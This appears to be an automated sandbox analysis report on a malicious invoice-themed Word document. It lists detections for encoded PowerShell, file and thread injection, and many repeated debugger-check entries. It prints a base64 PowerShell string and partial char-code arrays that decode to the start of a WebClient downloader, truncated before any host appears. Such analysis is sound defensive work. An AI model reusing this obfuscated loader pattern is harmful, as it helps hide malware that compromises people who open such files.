IABJAEUAWAAgACgAKAAoADMANgAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkAIAAsACAAMQAxADQALAAgADEAMAA1ACwAIAAxADEAMgAgACwAMQAxADYALAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACAALAAgADEAMAAxACwAIAAxADEAOQAgACwANAA1ACAALAAgADEAMQAxACwAIAA5ADgALAAxADAANgAsADEAMAAxACwAOQA5ACwAIAAxADEANgAgACwAIAAzADIALAA0ADUALAA2ADcALAAxADEAMQAsACAAMQAwADkAIAAsADcAOQAgACwAOQA4ACAALAAgADEAMAA2ACwAIAAxADAAMQAgACwAIAA5ADkALAAgADEAMQA2ACwAMwAyACAALAAgADgANwAsADgAMwAsACAAOQA5ACwAMQAxADQAIAAsACAAMQAwADUALAAgADEAMQAyACAALAAgADEAMQA2ACAALAA0ADYALAAgADgAMwAsADEAMAA0ACwAMQAwADEAIAAsADEAMAA4ACwAIAAxADAAOAAsADUAOQAgACwAIAAzADYALAAgADEAMQA5ACAALAAxADAAMQAsACAAOQA4ACAALAA5ADkAIAAsADEAMAA4ACwAMQAwADUALAAgADEAMAAxACAALAAxADEAMAAsADEAMQA2ACwAIAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACwAIAAxADAAMQAsACAAMQAxADkALAAgADQANQAgACwAIAAxADEAMQAgACwAOQA4ACAALAAxADAANgAgACwAIAAxADAAMQAgACwAOQA5ACAALAAxADEANgAsADMAMgAgACwAOAAzACAALAAxADIAMQAsADEAMQA1ACAALAAgADEAMQA2ACwAIAAxADAAMQAsACAAMQAwADkA
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded IEX (((36, 119 ,115, 99 , 114, 105, 112 ,116,32, 61 , 32, 110 , 101, 119 ,45 , 111, 98,106,101,99, 116 , 32,45,67,111, 109 ,79 ,98 , 106, 101 , 99, 116,32 , 87,83, 99,114 , 105, 112 , 116 ,46, 83,104,101 ,108, 108,59 , 36, 119 ,101, 98 ,99 ,108,105, 101 ,110,116, 32, 61 , 32, 110, 101, 119, 45 , 111 ,98 ,106 , 101 ,99 ,116,32 ,83 ,121,115 , 116, 101, 109, 46,78,101, 116 , 46 ,87,101 , 98, 67 ,108,105 ,101, 110 ,116, 59 , 36 , 114 ,97, 110,100,111,109 , 32 , 61,32 ,110, 101,119, 45, 111, 98, 106, 101
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded IEX (((36, 119 ,115, 99 , 114, 105, 112 ,116,32, 61 , 32, 110 , 101, 119 ,45 , 111, 98,106,101,99, 116 , 32,45,67,111, 109 ,79 ,98 , 106, 101 , 99, 116,32 , 87,83, 99,114 , 105, 112 , 116 ,46, 83,104,101 ,108, 108,59 , 36, 119 ,101, 98 ,99 ,108,105, 101 ,110,116, 32, 61 , 32, 110, 101, 119, 45 , 111 ,98 ,106 , 101 ,99 ,116,32 ,83 ,121,115 , 116, 101, 109, 46,78,101, 116 , 46 ,87,101 , 98, 67 ,108,105 ,101, 110 ,116, 59 , 36 , 114 ,97, 110,100,111,109 , 32 , 61,32 ,110, 101,119, 45, 111, 98, 106, 101
Injects files into Windows applicationShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEInjected file: C:\Users\user\Desktop\download\Client- 9650, Oct 2017 Invoice.doc was created by C:\Windows\System32\wget.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEInjected file: C:\Users\user\Desktop\download\Client- 9650, Oct 2017 Invoice.doc was created by C:\Windows\System32\wget.exe
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Windows\System32\helphome.exeThread register set: target process: 3996

Anti Debugging:

barindex
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write and page guard
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: KernelDebuggerInformation
Checks if the current process is being debuggedShow sources
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEProcess queried: DebugPort
